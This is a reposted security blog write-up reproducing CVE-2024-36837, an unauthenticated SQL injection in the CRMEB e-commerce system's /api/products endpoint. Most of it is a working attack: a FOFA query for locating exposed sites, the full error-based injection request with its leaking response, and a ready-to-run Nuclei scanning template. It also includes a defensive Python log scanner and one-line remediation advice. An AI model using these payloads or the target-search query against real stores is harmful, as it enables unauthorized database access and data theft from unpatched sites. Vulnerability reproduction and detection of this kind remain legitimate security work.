CVE-2024-36837 Vulnerability Reproduction

admin, 2024-06-20 12:34:31


01 Vulnerability Name

SQL injection in the /api/products endpoint of the CRMEB e-commerce system

02 Affected Versions

CRMEB e-commerce system, versions below 5.2.2

CRMEB is an open-source project, hosted at:

https://github.com/crmeb/CRMEB

03 Description

The CRMEB open-source mall system is a fully open-source, commercially usable system built with separated front end and back end. It is 100% open source, runs on mini-programs, official accounts, H5, apps and PC, and is easy to use, easy to customise and simple to install.

The system's /api/products endpoint contains an SQL injection vulnerability. An unauthenticated attacker can exploit it to obtain sensitive data; please patch promptly.

04 FOFA Search Query

body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"


05 Reproduction

Send the following request to the lab target.

The injected expression makes the database compute md5(9753165):


GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The response is shown below; it contains the string 9D414380D9F6067A05CCD40D5311B04A (MySQL's md5() returns it in lowercase, which is how it appears in the error message).

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Authori-zation,Authorization, Content-Type, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, X-Requested-With, Form-type, Cb-lang, Invalid-zation
Access-Control-Allow-Methods: GET,POST,PATCH,PUT,DELETE,OPTIONS,DELETE
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 1728000
Content-Type: application/json; charset=utf-8
Date: Thu, 20 Jun 2024 01:34:53 GMT
Server: nginx
Set-Cookie: cb_lang=zh-cn; path=/
Set-Cookie: PHPSESSID=2fe2fe4f826c7d432b233fd4fcb29a5c; path=/

{"status":400,"msg":"SQLSTATE[HY000]: General error: 1772 Malformed GTID set specification '~9d414380d9f6067a05ccd40d5311b04a~'.","data":{"message":"SQLSTATE[HY000]: General error: 1772 Malformed GTID set specification '~9d414380d9f6067a05ccd40d5311b04a~'.","file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db\/PDOConnection.php","line":771,"trace":[{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/PDOConnection.php","line":688,"function":"getPDOStatement","class":"think\db\PDOConnection","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/PDOConnection.php","line":889,"function":"pdoQuery","class":"think\db\PDOConnection","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/BaseQuery.php","line":1090,"function":"select","class":"think\db\PDOConnection","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/app/dao/product/product/StoreProductDao.php","line":127,"function":"select","class":"think\db\BaseQuery","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":788,"function":"app\dao\product\product\{closure}","class":"app\dao\product\product\StoreProductDao","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":754,"function":"parseClosure","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":529,"function":"parseIn","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":386,"function":"parseWhereItem","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":331,"function":"parseWhereLogic","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/czcsyy.com/crmeb/vendor/topthink/think-orm/src/db/Builder.php","line":299,"function":"buildWhere","class":"think\db\Builder","type":"->"},{"file":"/www/wwwroot/


Reproduction succeeded.

06 Nuclei PoC

The PoC template contents are as follows:

id: CVE-2024-36837

info:
  name: CRMEB v.5.2.2 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
  reference:
    - https://github.com/phtcloud-dev/CVE-2024-36837
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36837
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="CRMEB"
  tags: cve,cve2024,crmeb,sqli

variables:
  num: "{{rand_int(9000000, 9999999)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
          - "SQLSTATE"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950


07 Remediation

Upgrade to the latest version.
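As an added defender-side example (not from the original post or the CRMEB project), the following Python scans web-server access log lines for the request shape shown in section 05: a GET to /api/products whose selectId parameter is anything other than a plain comma-separated list of numeric product ids. The log lines, IP addresses and the assumption that selectId should only ever carry integer ids are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in nginx "combined" format (not real traffic).
# Line 1 is the probe from the write-up, line 3 a cruder variant, 2 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jun/2024:09:34:53 +0800] "GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1" 400 512 "-" "Mozilla/5.0"
10.0.0.6 - - [20/Jun/2024:09:35:10 +0800] "GET /api/products?limit=20&selectId=12,34,56 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Jun/2024:09:35:12 +0800] "GET /api/products?limit=20&selectId=1%20OR%201%3D1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.8 - - [20/Jun/2024:09:35:20 +0800] "GET /api/index HTTP/1.1" 200 100 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed contract for selectId: one or more decimal product ids, comma-separated.
ID_LIST_RE = re.compile(r"^\d+(,\d+)*$")


def selectid_is_clean(value: str) -> bool:
    """True when an already URL-decoded selectId is a plain comma-separated id list."""
    return ID_LIST_RE.match(value) is not None


def scan_line(line: str):
    """Return a finding dict for a suspicious /api/products request, or None."""
    m = LOG_RE.match(line)
    if m is None or m.group("method") != "GET":
        return None
    url = urlsplit(m.group("target"))
    if url.path != "/api/products":
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so the SELECT+(ELT(...
    # form from the write-up is normalised before the allow-list check.
    values = parse_qs(url.query, keep_blank_values=True).get("selectId", [])
    bad = [v for v in values if not selectid_is_clean(v)]
    if not bad:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": m.group("status"), "selectId": bad[0]}


def scan_log(text: str) -> list:
    """Scan every line of an access log and collect the findings."""
    return [f for f in map(scan_line, text.splitlines()) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The status code is kept in each finding because, as the response in section 05 shows, a successful error-based probe against a deployment that returns database errors comes back as HTTP 400 with an SQLSTATE message, so 400s on this path are worth correlating with the application log.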

Originally published on the WeChat public account AI与网安: CVE-2024-36837 Vulnerability Reproduction

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes none. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
Please keep this link when reposting (CN-SEC中文网; thanks to the original author): CVE-2024-36837 Vulnerability Reproduction https://cn-sec.com/archives/2865673.html